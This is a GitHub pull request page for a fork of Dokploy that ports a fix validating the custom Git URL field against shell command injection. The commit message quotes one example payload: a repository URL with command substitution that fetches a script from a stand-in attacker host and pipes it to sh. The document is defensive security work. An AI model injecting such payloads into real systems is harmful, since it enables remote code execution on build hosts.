Skip to content

fix: validate customGitUrl to prevent command injection#66

Merged
AminDhouib merged 2 commits into
canaryfrom
port/upr-4676
Jul 15, 2026
Merged

fix: validate customGitUrl to prevent command injection#66
AminDhouib merged 2 commits into
canaryfrom
port/upr-4676

Conversation

@AminDhouib

@AminDhouib AminDhouib commented Jul 12, 2026

Copy link
Copy Markdown
Member

Ports Dokploy#4676 by @gsmatheus (1 commit, cherry-picked with -x, original authorship preserved).

Vulnerability class

The custom Git provider's repository URL is user-controlled and ultimately reaches shell-executed git commands. Because it was accepted without validation, values containing shell metacharacters / command-substitution sequences could be smuggled into those commands.

Fix

  • New packages/server/src/utils/git-url-validation.ts: allowlist-style regexes for HTTPS (http(s)://…) and SSH (git@host:path, ssh://git@host[:port]:path) clone-URL shapes that reject shell metacharacters ($, backticks, ;, |, &, redirects, quotes, whitespace, brackets).
  • apiSaveGitProvider (zod schema in packages/server/src/db/schema/application.ts) now requires customGitUrl to be non-empty and match those patterns ("Invalid Git URL").

No drizzle table/column change — this touches only the zod API schema, so no migration is involved. The fork's application.saveGitProvider router endpoint consumes apiSaveGitProvider, so the validation is effective on the same path as upstream.

Adaptations

None — applied cleanly onto fork canary (fork's apiSaveGitProvider block matches upstream).

Test evidence

  • pnpm --filter=@dokploy/server run typecheck and pnpm --filter=dokploy run typecheck: both clean.
  • Existing tests referencing customGitUrl only set it on mock entities (not via the API schema) and use valid HTTPS URLs where it matters — no test-surface impact.

Overlap notes

No file overlap with open fork PRs #36/#58 or with the other salvo-2 M2 ports.

gsmatheus and others added 2 commits July 12, 2026 10:41
…bstitution

The customGitUrl field was only validated with z.string().optional() —
no shell-metacharacter restriction. An authenticated user could inject
arbitrary shell commands via command substitution, e.g.:

  customGitUrl: "https://github.com/x.git$(curl attacker.com | sh)"

The $(...) is expanded by the shell before git clone runs, executing
the injected command on the build host (local or remote SSH).

customGitBranch is already protected by VALID_BRANCH_REGEX; this adds
equivalent validation for customGitUrl via VALID_GIT_URL_REGEX which
accepts standard HTTPS and SSH Git URLs while rejecting shell
metacharacters ($, `, ;, |, &, etc.).

See SECURITY-AUDIT.md for full details.

(cherry picked from commit 5a3c1b1)
@AminDhouib AminDhouib merged commit 20c1028 into canary Jul 15, 2026
3 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants